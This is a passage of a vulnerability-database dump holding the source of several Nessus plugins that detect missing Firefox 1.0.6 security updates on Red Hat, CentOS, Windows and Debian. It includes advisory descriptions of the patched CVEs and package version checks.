JavaScript\nfunctions. It is possible for a malicious web page to crash the\nbrowser by executing malformed JavaScript code. (CVE-2005-2265)\n\nA bug was found in the way Firefox handled multiple frame domains. It\nis possible for a frame as part of a malicious website to inject\ncontent into a frame that belongs to another domain. This issue was\npreviously fixed as CVE-2004-0718 but was accidentally disabled.\n(CVE-2005-1937)\n\nA bug was found in the way Firefox handled child frames. It is\npossible for a malicious framed page to steal sensitive information\nfrom its parent page. (CVE-2005-2266)\n\nA bug was found in the way Firefox opened URLs from media players. If\na media player opens a URL that is JavaScript, JavaScript is executed\nwith access to the currently open webpage. (CVE-2005-2267)\n\nA design flaw was found in the way Firefox displayed alerts and\nprompts. Alerts and prompts were given the generic title [JavaScript\nApplication] which prevented a user from knowing which site created\nthem. (CVE-2005-2268)\n\nA bug was found in the way Firefox handled DOM node names. It is\npossible for a malicious site to overwrite a DOM node name, allowing\ncertain privileged chrome actions to execute the malicious JavaScript.\n(CVE-2005-2269)\n\nA bug was found in the way Firefox cloned base objects. It is possible\nfor Web content to navigate up the prototype chain to gain access to\nprivileged chrome objects. (CVE-2005-2270)\n\nUsers of Firefox are advised to upgrade to this updated package that\ncontains Firefox version 1.0.6 and is not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-1937\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2261\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2262\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2264\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2265\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2266\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2267\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2268\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2269\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2270\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:586\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox compareTo() Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:586\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"firefox-1.0.6-1.4.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T04:08:27", "description": "The remote version of Firefox contains various security issues that\nmay allow an attacker execute arbitrary code on the remote host.", "edition": 30, "published": "2005-07-13T00:00:00", "title": "Firefox < 1.0.6 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2004-0718", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2395", "CVE-2005-2268", "CVE-2005-2266"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MOZILLA_FIREFOX_105.NASL", "href": "https://www.tenable.com/plugins/nessus/18689", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(18689);\n script_version(\"1.30\");\n\n script_cve_id(\"CVE-2004-0718\", \"CVE-2005-1937\", \"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\", \n \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\", \"CVE-2005-2267\", \n \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\", \"CVE-2005-2395\");\n script_bugtraq_id(14242, 14325);\n\n script_name(english:\"Firefox < 1.0.6 Multiple Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote version of Firefox contains various security issues that\nmay allow an attacker execute arbitrary code on the remote host.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-45/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-46/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-47/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-48/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-49/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-50/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-51/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-52/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-53/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-54/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-55/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-56/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Firefox 1.0.6 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox compareTo() Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/07/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/04/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2005/07/19\");\n script_cvs_date(\"Date: 2018/07/17 12:00:07\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\nscript_end_attributes();\n\n script_summary(english:\"Determines the version of Firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows\");\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\nport = get_kb_item_or_exit(\"SMB/transport\"); \n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:FALSE, fix:'1.0.6', severity:SECURITY_HOLE);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:24:51", "description": "An updated firefox package that fixes various security bugs is now\navailable for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nMozilla Firefox is an open source Web browser.\n\nA bug was found in the way Firefox handled synthetic events. It is\npossible that Web content could generate events such as keystrokes or\nmouse clicks that could be used to steal data or execute malicious\nJavaScript code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-2260 to this issue.\n\nA bug was found in the way Firefox executed JavaScript in XBL\ncontrols. It is possible for a malicious webpage to leverage this\nvulnerability to execute other JavaScript based attacks even when\nJavaScript is disabled. (CVE-2005-2261)\n\nA bug was found in the way Firefox set an image as the desktop\nwallpaper. If a user chooses the 'Set As Wallpaper...' context menu\nitem on a specially crafted image, it is possible for an attacker to\nexecute arbitrary code on a victim's machine. (CVE-2005-2262)\n\nA bug was found in the way Firefox installed its extensions. If a user\ncan be tricked into visiting a malicious webpage, it may be possible\nto obtain sensitive information such as cookies or passwords.\n(CVE-2005-2263)\n\nA bug was found in the way Firefox handled the _search target. It is\npossible for a malicious website to inject JavaScript into an already\nopen webpage. (CVE-2005-2264)\n\nA bug was found in the way Firefox handled certain JavaScript\nfunctions. It is possible for a malicious web page to crash the\nbrowser by executing malformed JavaScript code. (CVE-2005-2265)\n\nA bug was found in the way Firefox handled multiple frame domains. It\nis possible for a frame as part of a malicious website to inject\ncontent into a frame that belongs to another domain. This issue was\npreviously fixed as CVE-2004-0718 but was accidentally disabled.\n(CVE-2005-1937)\n\nA bug was found in the way Firefox handled child frames. It is\npossible for a malicious framed page to steal sensitive information\nfrom its parent page. (CVE-2005-2266)\n\nA bug was found in the way Firefox opened URLs from media players. If\na media player opens a URL that is JavaScript, JavaScript is executed\nwith access to the currently open webpage. (CVE-2005-2267)\n\nA design flaw was found in the way Firefox displayed alerts and\nprompts. Alerts and prompts were given the generic title [JavaScript\nApplication] which prevented a user from knowing which site created\nthem. (CVE-2005-2268)\n\nA bug was found in the way Firefox handled DOM node names. It is\npossible for a malicious site to overwrite a DOM node name, allowing\ncertain privileged chrome actions to execute the malicious JavaScript.\n(CVE-2005-2269)\n\nA bug was found in the way Firefox cloned base objects. It is possible\nfor Web content to navigate up the prototype chain to gain access to\nprivileged chrome objects. (CVE-2005-2270)\n\nUsers of Firefox are advised to upgrade to this updated package that\ncontains Firefox version 1.0.6 and is not vulnerable to these issues.", "edition": 29, "published": "2006-07-05T00:00:00", "title": "CentOS 4 : firefox (CESA-2005:586)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2004-0718", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2114", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "modified": "2006-07-05T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:firefox"], "id": "CENTOS_RHSA-2005-586.NASL", "href": "https://www.tenable.com/plugins/nessus/21949", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:586 and \n# CentOS Errata and Security Advisory 2005:586 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21949);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0718\", \"CVE-2005-1937\", \"CVE-2005-2114\", \"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\", \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\", \"CVE-2005-2267\", \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\");\n script_xref(name:\"RHSA\", value:\"2005:586\");\n\n script_name(english:\"CentOS 4 : firefox (CESA-2005:586)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated firefox package that fixes various security bugs is now\navailable for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nMozilla Firefox is an open source Web browser.\n\nA bug was found in the way Firefox handled synthetic events. It is\npossible that Web content could generate events such as keystrokes or\nmouse clicks that could be used to steal data or execute malicious\nJavaScript code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-2260 to this issue.\n\nA bug was found in the way Firefox executed JavaScript in XBL\ncontrols. It is possible for a malicious webpage to leverage this\nvulnerability to execute other JavaScript based attacks even when\nJavaScript is disabled. (CVE-2005-2261)\n\nA bug was found in the way Firefox set an image as the desktop\nwallpaper. If a user chooses the 'Set As Wallpaper...' context menu\nitem on a specially crafted image, it is possible for an attacker to\nexecute arbitrary code on a victim's machine. (CVE-2005-2262)\n\nA bug was found in the way Firefox installed its extensions. If a user\ncan be tricked into visiting a malicious webpage, it may be possible\nto obtain sensitive information such as cookies or passwords.\n(CVE-2005-2263)\n\nA bug was found in the way Firefox handled the _search target. It is\npossible for a malicious website to inject JavaScript into an already\nopen webpage. (CVE-2005-2264)\n\nA bug was found in the way Firefox handled certain JavaScript\nfunctions. It is possible for a malicious web page to crash the\nbrowser by executing malformed JavaScript code. (CVE-2005-2265)\n\nA bug was found in the way Firefox handled multiple frame domains. It\nis possible for a frame as part of a malicious website to inject\ncontent into a frame that belongs to another domain. This issue was\npreviously fixed as CVE-2004-0718 but was accidentally disabled.\n(CVE-2005-1937)\n\nA bug was found in the way Firefox handled child frames. It is\npossible for a malicious framed page to steal sensitive information\nfrom its parent page. (CVE-2005-2266)\n\nA bug was found in the way Firefox opened URLs from media players. If\na media player opens a URL that is JavaScript, JavaScript is executed\nwith access to the currently open webpage. (CVE-2005-2267)\n\nA design flaw was found in the way Firefox displayed alerts and\nprompts. Alerts and prompts were given the generic title [JavaScript\nApplication] which prevented a user from knowing which site created\nthem. (CVE-2005-2268)\n\nA bug was found in the way Firefox handled DOM node names. It is\npossible for a malicious site to overwrite a DOM node name, allowing\ncertain privileged chrome actions to execute the malicious JavaScript.\n(CVE-2005-2269)\n\nA bug was found in the way Firefox cloned base objects. It is possible\nfor Web content to navigate up the prototype chain to gain access to\nprivileged chrome objects. (CVE-2005-2270)\n\nUsers of Firefox are advised to upgrade to this updated package that\ncontains Firefox version 1.0.6 and is not vulnerable to these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-July/011942.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?512e4f04\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-July/011949.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?994f6180\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-July/011950.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?23069d2f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox compareTo() Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"firefox-1.0.6-1.4.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"firefox-1.0.6-1.4.1.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"firefox-1.0.6-1.4.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:03:27", "description": "We experienced that the update for Mozilla Firefox from DSA 779-1\nunfortunately was a regression in several cases. Since the usual\npraxis of backporting apparently does not work, this update is\nbasically version 1.0.6 with the version number rolled back, and hence\nstill named 1.0.4-*. For completeness below is the original advisory\ntext :\n\n Several problems have been discovered in Mozilla Firefox, a\n lightweight web browser based on Mozilla. The Common Vulnerabilities\n and Exposures project identifies the following problems :\n\n - CAN-2005-2260\n The browser user interface does not properly\n distinguish between user-generated events and\n untrusted synthetic events, which makes it easier for\n remote attackers to perform dangerous actions that\n normally could only be performed manually by the user.\n\n - CAN-2005-2261\n\n XML scripts ran even when JavaScript disabled.\n\n - CAN-2005-2262\n\n The user can be tricked to executing arbitrary\n JavaScript code by using a JavaScript URL as\n wallpaper.\n\n - CAN-2005-2263\n\n It is possible for a remote attacker to execute a\n callback function in the context of another domain\n (i.e. frame).\n\n - CAN-2005-2264\n\n By opening a malicious link in the sidebar it is\n possible for remote attackers to steal sensitive\n information.\n\n - CAN-2005-2265\n\n Missing input sanitising of InstallVersion.compareTo()\n can cause the application to crash.\n\n - CAN-2005-2266\n\n Remote attackers could steal sensitive information\n such as cookies and passwords from websites by\n accessing data in alien frames.\n\n - CAN-2005-2267\n\n By using standalone applications such as Flash and\n QuickTime to open a javascript: URL, it is possible\n for a remote attacker to steal sensitive information\n and possibly execute arbitrary code.\n\n - CAN-2005-2268\n\n It is possible for a JavaScript dialog box to spoof a\n dialog box from a trusted site and facilitates\n phishing attacks.\n\n - CAN-2005-2269\n\n Remote attackers could modify certain tag properties\n of DOM nodes that could lead to the execution of\n arbitrary script or code.\n\n - CAN-2005-2270\n\n The Mozilla browser family does not properly clone\n base objects, which allows remote attackers to execute\n arbitrary code.", "edition": 26, "published": "2005-08-23T00:00:00", "title": "Debian DSA-779-2 : mozilla-firefox - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2005-2271", "CVE-2005-2261", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2273", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2272", "CVE-2005-2262", "CVE-2005-2274", "CVE-2005-2268", "CVE-2005-2266"], "modified": "2005-08-23T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:mozilla-firefox"], "id": "DEBIAN_DSA-779.NASL", "href": "https://www.tenable.com/plugins/nessus/19476", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-779. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19476);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\", \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\", \"CVE-2005-2267\", \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\", \"CVE-2005-2271\", \"CVE-2005-2272\", \"CVE-2005-2273\", \"CVE-2005-2274\");\n script_bugtraq_id(14242);\n script_xref(name:\"DSA\", value:\"779\");\n\n script_name(english:\"Debian DSA-779-2 : mozilla-firefox - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"We experienced that the update for Mozilla Firefox from DSA 779-1\nunfortunately was a regression in several cases. Since the usual\npraxis of backporting apparently does not work, this update is\nbasically version 1.0.6 with the version number rolled back, and hence\nstill named 1.0.4-*. For completeness below is the original advisory\ntext :\n\n Several problems have been discovered in Mozilla Firefox, a\n lightweight web browser based on Mozilla. The Common Vulnerabilities\n and Exposures project identifies the following problems :\n\n - CAN-2005-2260\n The browser user interface does not properly\n distinguish between user-generated events and\n untrusted synthetic events, which makes it easier for\n remote attackers to perform dangerous actions that\n normally could only be performed manually by the user.\n\n - CAN-2005-2261\n\n XML scripts ran even when JavaScript disabled.\n\n - CAN-2005-2262\n\n The user can be tricked to executing arbitrary\n JavaScript code by using a JavaScript URL as\n wallpaper.\n\n - CAN-2005-2263\n\n It is possible for a remote attacker to execute a\n callback function in the context of another domain\n (i.e. frame).\n\n - CAN-2005-2264\n\n By opening a malicious link in the sidebar it is\n possible for remote attackers to steal sensitive\n information.\n\n - CAN-2005-2265\n\n Missing input sanitising of InstallVersion.compareTo()\n can cause the application to crash.\n\n - CAN-2005-2266\n\n Remote attackers could steal sensitive information\n such as cookies and passwords from websites by\n accessing data in alien frames.\n\n - CAN-2005-2267\n\n By using standalone applications such as Flash and\n QuickTime to open a javascript: URL, it is possible\n for a remote attacker to steal sensitive information\n and possibly execute arbitrary code.\n\n - CAN-2005-2268\n\n It is possible for a JavaScript dialog box to spoof a\n dialog box from a trusted site and facilitates\n phishing attacks.\n\n - CAN-2005-2269\n\n Remote attackers could modify certain tag properties\n of DOM nodes that could lead to the execution of\n arbitrary script or code.\n\n - CAN-2005-2270\n\n The Mozilla browser family does not properly clone\n base objects, which allows remote attackers to execute\n arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=318061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-779\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Mozilla Firefox packages.\n\nThe old stable distribution (woody) is not affected by these problems.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.0.4-2sarge3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox compareTo() Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mozilla-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif 